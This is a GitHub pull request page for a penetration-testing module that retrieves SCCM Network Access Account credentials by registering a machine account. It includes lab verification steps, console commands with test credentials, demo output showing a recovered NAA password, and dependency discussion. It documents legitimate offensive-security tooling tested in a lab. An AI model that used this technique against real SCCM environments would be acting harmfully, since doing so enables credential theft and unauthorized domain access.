Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NAA creds from SCCM #19712

Open
wants to merge 18 commits into
base: master
Choose a base branch
from
Open

NAA creds from SCCM #19712

wants to merge 18 commits into from

Conversation

smashery
Copy link
Contributor

This implements retrieval of NAA creds from an SCCM server. Given a computer name and password (which can typically be created by a standard AD domain user), a misconfigured system will just give out

Depends on rapid7/rex-mime#5 and lemontree55/rasn1#40

The main limitation of this work to date is that I've only been able to test on one SCCM server. I'm aware that different crypto schemes are in use, so for now I've given clear error messages in those cases.

Verification

I set up a test environment using GOAD.

  • Start msfconsole
  • Create a new computer account using the samr_computer (soon samr_account) module.
  • use auxiliary/admin/sccm/get_naa_creds
  • Run the module with the rhost set to the Domain Controller, with valid domain creds (low priv should be fine), and the computer creds you just optained.
  • Verify that it successfully gets NAA creds
  • Run it again, setting MANAGEMENT_POINT and SITE_CODE to the values that the module found on the first run (and no rhost)
  • Verify that it successfully gets NAA creds without connecting to LDAP for autodiscovery

Demo

Autodiscovery:

msf6 auxiliary(admin/sccm/get_naa_creds) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio
[*] Running module against 192.168.33.10

[*] Discovering base DN automatically
[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
[+] Found Management Point: MECM.sccm.lab (Site code: P01)
[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed

Explicit Management Point/Site Code:

msf6 auxiliary(admin/sccm/get_naa_creds) > run management_point=MECM.sccm.lab computer_user=DESKTOP-BXGIS9UE$ computer_pass=lkUEdeMQinNvgJ7mPV2787Cnf7lhQQio site_code=P01

[*] Got SMS ID: 2088712A-B957-43F1-B62E-E516A050D6F7
[*] Waiting 5 seconds for SCCM DB to update...
[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
[+] Found valid NAA creds: sccm.lab\sccm-naa:123456789
[*] Auxiliary module execution completed

@smashery smashery changed the title Naa creds NAA creds from SCCM Dec 10, 2024
@smashery
Copy link
Contributor Author

Once accepted, we should neaten up some of the duplicate structures in the PKINIT code (which are also CMS). I've kept that task separate for now.

@Snakpax
Copy link

Snakpax commented Dec 15, 2024

I appreciate this information I have been trying to properly set up my new environment and being self taught and learning everything on my own with Google's help and much time effort and trying this has been a journey but I am determined to achieve great things

@smashery smashery marked this pull request as ready for review December 16, 2024 03:57
@smashery smashery mentioned this pull request Dec 20, 2024
2 tasks
@smcintyre-r7
Copy link
Contributor

Do we have options to advance this independently of a rasn1 gem release? I see your PR was landed but there doens't appear to have been a new tag / release posted. I'll follow up on the PR, but thought I'd also ask here since I'm assuming it's going to be a hard blocker.

@smashery
Copy link
Contributor Author

@smcintyre-r7 - I believe the way to work around this would be to define the implicit value in each of the model definitions themselves (rather than using a wrapper to modify each of them). It's not "correct" having them as part of the model, but it would Work™️. We'd also need to validate that there are no instances where a particular type of model is implicited with one value one place, but a different value when being incorporated somewhere else. I guess you could make two otherwise-identical structures.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

4 participants